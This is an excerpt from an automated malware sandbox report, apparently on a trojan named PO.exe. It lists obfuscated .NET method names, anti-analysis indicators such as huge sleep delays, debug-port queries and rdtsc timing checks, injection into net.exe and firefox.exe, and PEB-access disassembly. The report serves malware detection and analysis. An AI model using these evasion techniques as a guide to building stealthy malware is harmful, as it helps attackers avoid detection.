                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, FaSxNGoXstTskEWaLl.cs, High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XgnMt0rHEu', 'QasMfmVrQ3', 'lO3MzaBFnF', 'Lp3k3ZLnOK', 'BALkYrYoCS', 'OKikMoNOc6', 'k19kk7p4kU', 'o9gh5wm1vH21iZdbKDF'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, jhT1XiYpCdoDYbJXImm.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VlfnmGo12P', 'jAEnTO96AP', 'pkMnLjpDvf', 'F4bnn6HHwR', 'drxns2EHXc', 'nmSnAbsJqN', 'uVlngLZHX7'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, cV34pg4nlMsrLlgM57.cs, High entropy of concatenated method names: 'Dispose', 'y9OYtTkQI7', 'kFFMSwmVm0', 'DLr6wSy5o2', 'ci7YftxOjc', 'XBnYzfufQL', 'ProcessDialogKey', 'to3M3FGfLm', 'p0bMYeEl6p', 'deHMM8246S'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, JjfvtCpQ90QHC8YwOa.cs, High entropy of concatenated method names: 'qhQY6g4bTw', 'deNYcbeeam', 'hbHYlBh6yT', 'XkOYFAumRl', 'FWdYvx63v7', 'KlbYItoKQt', 'kD4UKlWQr2LA4Eya17', 'hLtNQ1cDfw24HSW5WT', 'FBEYYLo8si', 'XgeYkqig9o'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, GPgPkY2haQbtV4AXYS.cs, High entropy of concatenated method names: 'mBj6U6X0sQ', 'k2t6ocAH0D', 'XFA6Qev4re', 'EcxQfXGRFN', 'Or3QzPtbHa', 'ldn63GBU4x', 'nSI6YVBNYS', 'YY76Mp5w6w', 'IwU6kvasYh', 'Unu6pKLtYk'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.cs, High entropy of concatenated method names: 'I0TkrMi9YH', 'bp1kUD7LEb', 'XWMk46QZU2', 'c8CkokmOq5', 'YXskEHW5kX', 'KF3kQiux3l', 'GKrk68oABi', 'UcpkcZqhkO', 'qR6kJ9lbx2', 'QQqklirKsB'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, YfEwfPq0cNftvy77Y3.cs, High entropy of concatenated method names: 'Bt0C1Kf9cL', 'FKBCw2s2ip', 'JNdCiAjCYG', 'g8NCSttm9i', 'zFyCynAK4O', 'QoTCjhhK9T', 'enjC2iEZpl', 'KWcCalifbe', 'QGbC7Oousx', 'nGBCXiW6W3'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, KmRl7VxlriI9kxWdx6.cs, High entropy of concatenated method names: 'tGhE9KfFQs', 'fquENbN3ff', 'OTGohwWpFS', 'zH1oy2Th0G', 'n9Loj0tclK', 'MaKou33yKu', 'uEPo2322gY', 'unSoalFD1x', 'OZ0odxkUMX', 'mDro7CV8Wj'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, V246SPfLB9B0nkmoR9.cs, High entropy of concatenated method names: 'pQnTo7LBJp', 'bnjTEx1ZhC', 'TdVTQ8JDpm', 'iTAT6JaVd3', 'M8aTmDHgRm', 'fviTcM48Xa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, ig4bTw1peNbeeam7US.cs, High entropy of concatenated method names: 'lBM4VqfqQl', 'iHo4OYIcdQ', 'b4M4BTRVWN', 'M7c4ec5VQZ', 'wEJ40qujJn', 'TEu48aJeDG', 'GIH456t9gw', 'VhY4HHnp2D', 'ISB4t6tKMT', 'AbH4f5RAuT'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, OIjuNTe8TPtPScTDyL.cs, High entropy of concatenated method names: 'n6cRlZTS0t', 'EwSRFtsAhM', 'ToString', 'pL1RUB5bfm', 'VMuR4VbOgn', 'OCMRojeeO4', 'R1eREbW6Wy', 'XCcRQNGijL', 'PEOR6ldLg4', 'BeGRcqiUdU'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, Q5Zb9HBTdH5ROZccae.cs, High entropy of concatenated method names: 'ToString', 'G4TIXtMPYN', 'gy2IShOp7C', 'MgcIhwVmkj', 'LuCIyTdv4u', 'RXKIj9O8dK', 'keQIunAV1g', 'p97I2d2eJ6', 'TZVIayWwDg', 'u9qIdePS2r'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, LJXv6mVmARH9qRMaNn.cs, High entropy of concatenated method names: 'fiOv7KGPsT', 'emYvWAKdp5', 'e9ovVlVeZo', 'sw0vOvlufw', 'fVXvStrq6i', 'KigvhPKDOp', 'yP0vy9RAVQ', 'jYFvj4ZdTp', 'jdBvu60lmG', 'Q0Gv2YMMHq'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, PpQpfidHiMBRwlNE5t.cs, High entropy of concatenated method names: 'Qr76PJplyu', 'Nxf6bvrtVu', 'nS16Zy7H48', 'eWf6G16jeb', 'PDu69cMdIR', 'Kho6Dbl71Q', 'QOE6N9u5on', 'Jrp61gmJIr', 'knV6wfoyeu', 'ln96xjhx1c'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, TyBLcDYYLbql4ngERhe.cs, High entropy of concatenated method names: 'B0vTfUnHmk', 'TlqTzW3B94', 'ELcL3mnwqk', 'BCULYFJFdv', 'NT2LM5GvkT', 'pTILk9nBXT', 'AYXLpKUQiq', 'GqTLrV1De1', 'sVHLU2Pcyj', 'NAqL4kk2qX'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, av7ulbitoKQtA90BkM.cs, High entropy of concatenated method names: 'gxVQrX66Qs', 'BIaQ4faSwJ', 'rpFQE95QvW', 'cHxQ6rMHw4', 'fjhQcwqVCl', 'pWkE0V0FAs', 'fytE8JaDUe', 'tCaE5u4XcV', 'RFfEHqbDKo', 'NaQEticUjp'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, c8E47WY3nR71XXLfsaI.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bf1TX2cyQZ', 'nJ5TWy9tKA', 'z37Tqt66FR', 'lkxTVsBumd', 'dbXTO4lWWV', 'njWTBh6NpB', 'L9ETekNkdC'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, bShmESM9SRrFA60ikF.cs, High entropy of concatenated method names: 'kB1ZIfPVf', 'NiLGgX98K', 'GWSD91EeN', 'F9KNvGmte', 'f7Dw8D4BJ', 'mxhxdBwBh', 'wjibBV2G2E9k6Zc9vd', 'EKR5CR7wRb4PFrrwQj', 'hXmKEbZTv', 'csaTqtnCv'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, GmfL8EwbHBh6yTtkOA.cs, High entropy of concatenated method names: 'eESoGpkep6', 'nfQoDiPZGi', 'AFWo1UUTBj', 'lg5owigcPg', 'nQYovpYH6v', 'WZGoInTMpl', 'QHioRli6ol', 'D5VoKVDUbW', 'jXdom9tg9P', 'BGqoT3yU8a'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, hlw9yp8pLPs8k0TdZx.cs, High entropy of concatenated method names: 'vAkRHEDXel', 'vdxRfHwWPC', 'I0KK3HeCCU', 'yv5KY6lCpp', 'yBYRXx0Aa0', 'k67RWjMJH1', 'oNsRqNy5qX', 'DhPRVUKNGB', 'J4bROZdv1w', 'UIIRBby8WM'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, IVOaPb56Xb9OTkQI7M.cs, High entropy of concatenated method names: 'zsJmv6WFyg', 'dfymRc5Uhg', 'KRNmmuJOEq', 'IsjmLhTMEt', 'zfXmsqLC6i', 'bT8mgT6lNP', 'Dispose', 'bC7KUwkUOY', 'JAGK48EQnI', 'eecKoTKaSP'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, kud7D5zoOcgaQh10wk.cs, High entropy of concatenated method names: 'PCiTDs15Zn', 'csFT14Qigy', 'PL1Twt6eVv', 'P3BTi1enV7', 'bw9TSwNDfC', 'kqHTyXC1ap', 'du6TjcFYnC', 'n3oTgn7Vts', 'ROsTP0jrsE', 'J4kTbjFFVQ'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, aFGfLmtI0beEl6pkeH.cs, High entropy of concatenated method names: 'RBcmiRUW2T', 'QeemSVZh0k', 'W2qmhgaUV9', 'z02myKJgik', 'ycEmjPl8J8', 'vGYmuU65Si', 'yt6m24syK9', 'ko0maksEEM', 'C7ymdUJdWJ', 'wfWm7Ql8As'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, FaSxNGoXstTskEWaLl.cs, High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XgnMt0rHEu', 'QasMfmVrQ3', 'lO3MzaBFnF', 'Lp3k3ZLnOK', 'BALkYrYoCS', 'OKikMoNOc6', 'k19kk7p4kU', 'o9gh5wm1vH21iZdbKDF'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, jhT1XiYpCdoDYbJXImm.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VlfnmGo12P', 'jAEnTO96AP', 'pkMnLjpDvf', 'F4bnn6HHwR', 'drxns2EHXc', 'nmSnAbsJqN', 'uVlngLZHX7'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, cV34pg4nlMsrLlgM57.cs, High entropy of concatenated method names: 'Dispose', 'y9OYtTkQI7', 'kFFMSwmVm0', 'DLr6wSy5o2', 'ci7YftxOjc', 'XBnYzfufQL', 'ProcessDialogKey', 'to3M3FGfLm', 'p0bMYeEl6p', 'deHMM8246S'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, JjfvtCpQ90QHC8YwOa.cs, High entropy of concatenated method names: 'qhQY6g4bTw', 'deNYcbeeam', 'hbHYlBh6yT', 'XkOYFAumRl', 'FWdYvx63v7', 'KlbYItoKQt', 'kD4UKlWQr2LA4Eya17', 'hLtNQ1cDfw24HSW5WT', 'FBEYYLo8si', 'XgeYkqig9o'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, GPgPkY2haQbtV4AXYS.cs, High entropy of concatenated method names: 'mBj6U6X0sQ', 'k2t6ocAH0D', 'XFA6Qev4re', 'EcxQfXGRFN', 'Or3QzPtbHa', 'ldn63GBU4x', 'nSI6YVBNYS', 'YY76Mp5w6w', 'IwU6kvasYh', 'Unu6pKLtYk'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.cs, High entropy of concatenated method names: 'I0TkrMi9YH', 'bp1kUD7LEb', 'XWMk46QZU2', 'c8CkokmOq5', 'YXskEHW5kX', 'KF3kQiux3l', 'GKrk68oABi', 'UcpkcZqhkO', 'qR6kJ9lbx2', 'QQqklirKsB'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, YfEwfPq0cNftvy77Y3.cs, High entropy of concatenated method names: 'Bt0C1Kf9cL', 'FKBCw2s2ip', 'JNdCiAjCYG', 'g8NCSttm9i', 'zFyCynAK4O', 'QoTCjhhK9T', 'enjC2iEZpl', 'KWcCalifbe', 'QGbC7Oousx', 'nGBCXiW6W3'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, KmRl7VxlriI9kxWdx6.cs, High entropy of concatenated method names: 'tGhE9KfFQs', 'fquENbN3ff', 'OTGohwWpFS', 'zH1oy2Th0G', 'n9Loj0tclK', 'MaKou33yKu', 'uEPo2322gY', 'unSoalFD1x', 'OZ0odxkUMX', 'mDro7CV8Wj'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, V246SPfLB9B0nkmoR9.cs, High entropy of concatenated method names: 'pQnTo7LBJp', 'bnjTEx1ZhC', 'TdVTQ8JDpm', 'iTAT6JaVd3', 'M8aTmDHgRm', 'fviTcM48Xa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, ig4bTw1peNbeeam7US.cs, High entropy of concatenated method names: 'lBM4VqfqQl', 'iHo4OYIcdQ', 'b4M4BTRVWN', 'M7c4ec5VQZ', 'wEJ40qujJn', 'TEu48aJeDG', 'GIH456t9gw', 'VhY4HHnp2D', 'ISB4t6tKMT', 'AbH4f5RAuT'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, OIjuNTe8TPtPScTDyL.cs, High entropy of concatenated method names: 'n6cRlZTS0t', 'EwSRFtsAhM', 'ToString', 'pL1RUB5bfm', 'VMuR4VbOgn', 'OCMRojeeO4', 'R1eREbW6Wy', 'XCcRQNGijL', 'PEOR6ldLg4', 'BeGRcqiUdU'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, Q5Zb9HBTdH5ROZccae.cs, High entropy of concatenated method names: 'ToString', 'G4TIXtMPYN', 'gy2IShOp7C', 'MgcIhwVmkj', 'LuCIyTdv4u', 'RXKIj9O8dK', 'keQIunAV1g', 'p97I2d2eJ6', 'TZVIayWwDg', 'u9qIdePS2r'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, LJXv6mVmARH9qRMaNn.cs, High entropy of concatenated method names: 'fiOv7KGPsT', 'emYvWAKdp5', 'e9ovVlVeZo', 'sw0vOvlufw', 'fVXvStrq6i', 'KigvhPKDOp', 'yP0vy9RAVQ', 'jYFvj4ZdTp', 'jdBvu60lmG', 'Q0Gv2YMMHq'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, PpQpfidHiMBRwlNE5t.cs, High entropy of concatenated method names: 'Qr76PJplyu', 'Nxf6bvrtVu', 'nS16Zy7H48', 'eWf6G16jeb', 'PDu69cMdIR', 'Kho6Dbl71Q', 'QOE6N9u5on', 'Jrp61gmJIr', 'knV6wfoyeu', 'ln96xjhx1c'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, TyBLcDYYLbql4ngERhe.cs, High entropy of concatenated method names: 'B0vTfUnHmk', 'TlqTzW3B94', 'ELcL3mnwqk', 'BCULYFJFdv', 'NT2LM5GvkT', 'pTILk9nBXT', 'AYXLpKUQiq', 'GqTLrV1De1', 'sVHLU2Pcyj', 'NAqL4kk2qX'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, av7ulbitoKQtA90BkM.cs, High entropy of concatenated method names: 'gxVQrX66Qs', 'BIaQ4faSwJ', 'rpFQE95QvW', 'cHxQ6rMHw4', 'fjhQcwqVCl', 'pWkE0V0FAs', 'fytE8JaDUe', 'tCaE5u4XcV', 'RFfEHqbDKo', 'NaQEticUjp'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, c8E47WY3nR71XXLfsaI.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bf1TX2cyQZ', 'nJ5TWy9tKA', 'z37Tqt66FR', 'lkxTVsBumd', 'dbXTO4lWWV', 'njWTBh6NpB', 'L9ETekNkdC'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, bShmESM9SRrFA60ikF.cs, High entropy of concatenated method names: 'kB1ZIfPVf', 'NiLGgX98K', 'GWSD91EeN', 'F9KNvGmte', 'f7Dw8D4BJ', 'mxhxdBwBh', 'wjibBV2G2E9k6Zc9vd', 'EKR5CR7wRb4PFrrwQj', 'hXmKEbZTv', 'csaTqtnCv'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, GmfL8EwbHBh6yTtkOA.cs, High entropy of concatenated method names: 'eESoGpkep6', 'nfQoDiPZGi', 'AFWo1UUTBj', 'lg5owigcPg', 'nQYovpYH6v', 'WZGoInTMpl', 'QHioRli6ol', 'D5VoKVDUbW', 'jXdom9tg9P', 'BGqoT3yU8a'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, hlw9yp8pLPs8k0TdZx.cs, High entropy of concatenated method names: 'vAkRHEDXel', 'vdxRfHwWPC', 'I0KK3HeCCU', 'yv5KY6lCpp', 'yBYRXx0Aa0', 'k67RWjMJH1', 'oNsRqNy5qX', 'DhPRVUKNGB', 'J4bROZdv1w', 'UIIRBby8WM'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, IVOaPb56Xb9OTkQI7M.cs, High entropy of concatenated method names: 'zsJmv6WFyg', 'dfymRc5Uhg', 'KRNmmuJOEq', 'IsjmLhTMEt', 'zfXmsqLC6i', 'bT8mgT6lNP', 'Dispose', 'bC7KUwkUOY', 'JAGK48EQnI', 'eecKoTKaSP'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, kud7D5zoOcgaQh10wk.cs, High entropy of concatenated method names: 'PCiTDs15Zn', 'csFT14Qigy', 'PL1Twt6eVv', 'P3BTi1enV7', 'bw9TSwNDfC', 'kqHTyXC1ap', 'du6TjcFYnC', 'n3oTgn7Vts', 'ROsTP0jrsE', 'J4kTbjFFVQ'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, aFGfLmtI0beEl6pkeH.cs, High entropy of concatenated method names: 'RBcmiRUW2T', 'QeemSVZh0k', 'W2qmhgaUV9', 'z02myKJgik', 'ycEmjPl8J8', 'vGYmuU65Si', 'yt6m24syK9', 'ko0maksEEM', 'C7ymdUJdWJ', 'wfWm7Ql8As'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, FaSxNGoXstTskEWaLl.cs, High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XgnMt0rHEu', 'QasMfmVrQ3', 'lO3MzaBFnF', 'Lp3k3ZLnOK', 'BALkYrYoCS', 'OKikMoNOc6', 'k19kk7p4kU', 'o9gh5wm1vH21iZdbKDF'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, jhT1XiYpCdoDYbJXImm.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VlfnmGo12P', 'jAEnTO96AP', 'pkMnLjpDvf', 'F4bnn6HHwR', 'drxns2EHXc', 'nmSnAbsJqN', 'uVlngLZHX7'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, cV34pg4nlMsrLlgM57.cs, High entropy of concatenated method names: 'Dispose', 'y9OYtTkQI7', 'kFFMSwmVm0', 'DLr6wSy5o2', 'ci7YftxOjc', 'XBnYzfufQL', 'ProcessDialogKey', 'to3M3FGfLm', 'p0bMYeEl6p', 'deHMM8246S'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, JjfvtCpQ90QHC8YwOa.cs, High entropy of concatenated method names: 'qhQY6g4bTw', 'deNYcbeeam', 'hbHYlBh6yT', 'XkOYFAumRl', 'FWdYvx63v7', 'KlbYItoKQt', 'kD4UKlWQr2LA4Eya17', 'hLtNQ1cDfw24HSW5WT', 'FBEYYLo8si', 'XgeYkqig9o'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, GPgPkY2haQbtV4AXYS.cs, High entropy of concatenated method names: 'mBj6U6X0sQ', 'k2t6ocAH0D', 'XFA6Qev4re', 'EcxQfXGRFN', 'Or3QzPtbHa', 'ldn63GBU4x', 'nSI6YVBNYS', 'YY76Mp5w6w', 'IwU6kvasYh', 'Unu6pKLtYk'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.cs, High entropy of concatenated method names: 'I0TkrMi9YH', 'bp1kUD7LEb', 'XWMk46QZU2', 'c8CkokmOq5', 'YXskEHW5kX', 'KF3kQiux3l', 'GKrk68oABi', 'UcpkcZqhkO', 'qR6kJ9lbx2', 'QQqklirKsB'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, YfEwfPq0cNftvy77Y3.cs, High entropy of concatenated method names: 'Bt0C1Kf9cL', 'FKBCw2s2ip', 'JNdCiAjCYG', 'g8NCSttm9i', 'zFyCynAK4O', 'QoTCjhhK9T', 'enjC2iEZpl', 'KWcCalifbe', 'QGbC7Oousx', 'nGBCXiW6W3'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, KmRl7VxlriI9kxWdx6.cs, High entropy of concatenated method names: 'tGhE9KfFQs', 'fquENbN3ff', 'OTGohwWpFS', 'zH1oy2Th0G', 'n9Loj0tclK', 'MaKou33yKu', 'uEPo2322gY', 'unSoalFD1x', 'OZ0odxkUMX', 'mDro7CV8Wj'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, V246SPfLB9B0nkmoR9.cs, High entropy of concatenated method names: 'pQnTo7LBJp', 'bnjTEx1ZhC', 'TdVTQ8JDpm', 'iTAT6JaVd3', 'M8aTmDHgRm', 'fviTcM48Xa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, ig4bTw1peNbeeam7US.cs, High entropy of concatenated method names: 'lBM4VqfqQl', 'iHo4OYIcdQ', 'b4M4BTRVWN', 'M7c4ec5VQZ', 'wEJ40qujJn', 'TEu48aJeDG', 'GIH456t9gw', 'VhY4HHnp2D', 'ISB4t6tKMT', 'AbH4f5RAuT'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, OIjuNTe8TPtPScTDyL.cs, High entropy of concatenated method names: 'n6cRlZTS0t', 'EwSRFtsAhM', 'ToString', 'pL1RUB5bfm', 'VMuR4VbOgn', 'OCMRojeeO4', 'R1eREbW6Wy', 'XCcRQNGijL', 'PEOR6ldLg4', 'BeGRcqiUdU'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, Q5Zb9HBTdH5ROZccae.cs, High entropy of concatenated method names: 'ToString', 'G4TIXtMPYN', 'gy2IShOp7C', 'MgcIhwVmkj', 'LuCIyTdv4u', 'RXKIj9O8dK', 'keQIunAV1g', 'p97I2d2eJ6', 'TZVIayWwDg', 'u9qIdePS2r'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, LJXv6mVmARH9qRMaNn.cs, High entropy of concatenated method names: 'fiOv7KGPsT', 'emYvWAKdp5', 'e9ovVlVeZo', 'sw0vOvlufw', 'fVXvStrq6i', 'KigvhPKDOp', 'yP0vy9RAVQ', 'jYFvj4ZdTp', 'jdBvu60lmG', 'Q0Gv2YMMHq'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, PpQpfidHiMBRwlNE5t.cs, High entropy of concatenated method names: 'Qr76PJplyu', 'Nxf6bvrtVu', 'nS16Zy7H48', 'eWf6G16jeb', 'PDu69cMdIR', 'Kho6Dbl71Q', 'QOE6N9u5on', 'Jrp61gmJIr', 'knV6wfoyeu', 'ln96xjhx1c'
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, TyBLcDYYLbql4ngERhe.cs, High entropy of concatenated method names: 'B0vTfUnHmk', 'TlqTzW3B94', 'ELcL3mnwqk', 'BCULYFJFdv', 'NT2LM5GvkT', 'pTILk9nBXT', 'AYXLpKUQiq', 'GqTLrV1De1', 'sVHLU2Pcyj', 'NAqL4kk2qX'
                Source: C:\Users\user\Desktop\PO.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: PO.exe PID: 5932, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\net.exe, API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: 13D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: 3070000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: 2E40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: 8F20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: 9F20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: A120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: B120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: BB20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: CB20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Memory allocated: DB20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_004155F0 rdtsc 2_2_004155F0
                Source: C:\Users\user\Desktop\PO.exe, Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\net.exe, Window / User API: threadDelayed 9818
                Source: C:\Users\user\Desktop\PO.exe, API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exe, API coverage: 2.7 %
                Source: C:\Users\user\Desktop\PO.exe TID: 2144, Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 2536, Thread sleep count: 155 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 2536, Thread sleep time: -310000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 2536, Thread sleep count: 9818 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 2536, Thread sleep time: -19636000s >= -30000s
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe TID: 4088, Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe, Last function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exe, Last function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exe, Code function: 7_2_0043C680 FindFirstFileW,FindNextFileW,FindClose, 7_2_0043C680
                Source: C:\Users\user\Desktop\PO.exe, Thread delayed: delay time: 922337203685477
                Source: net.exe, 00000007.00000002.3002318934.0000000000611000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003562533.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2590709912.000002E7CBF3B000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
                Source: C:\Users\user\Desktop\PO.exe, Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\PO.exe, Process queried: DebugPort
                Source: C:\Windows\SysWOW64\net.exe, Process queried: DebugPort
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_004155F0 rdtsc 2_2_004155F0
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_00417783 LdrLoadDll, 2_2_00417783
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01788158 mov eax, dword ptr fs:[00000030h] 2_2_01788158
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_016EC156 mov eax, dword ptr fs:[00000030h] 2_2_016EC156
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_016F6154 mov eax, dword ptr fs:[00000030h] 2_2_016F6154
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_016F6154 mov eax, dword ptr fs:[00000030h] 2_2_016F6154
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01784144 mov eax, dword ptr fs:[00000030h] 2_2_01784144
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01784144 mov eax, dword ptr fs:[00000030h] 2_2_01784144
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01784144 mov ecx, dword ptr fs:[00000030h] 2_2_01784144
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01784144 mov eax, dword ptr fs:[00000030h] 2_2_01784144
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01784144 mov eax, dword ptr fs:[00000030h] 2_2_01784144
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_01720124 mov eax, dword ptr fs:[00000030h] 2_2_01720124
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179A118 mov ecx, dword ptr fs:[00000030h] 2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179A118 mov eax, dword ptr fs:[00000030h] 2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179A118 mov eax, dword ptr fs:[00000030h] 2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179A118 mov eax, dword ptr fs:[00000030h] 2_2_0179A118
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_017B0115 mov eax, dword ptr fs:[00000030h] 2_2_017B0115
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h] 2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h] 2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h] 2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h] 2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h] 2_2_0179E10E
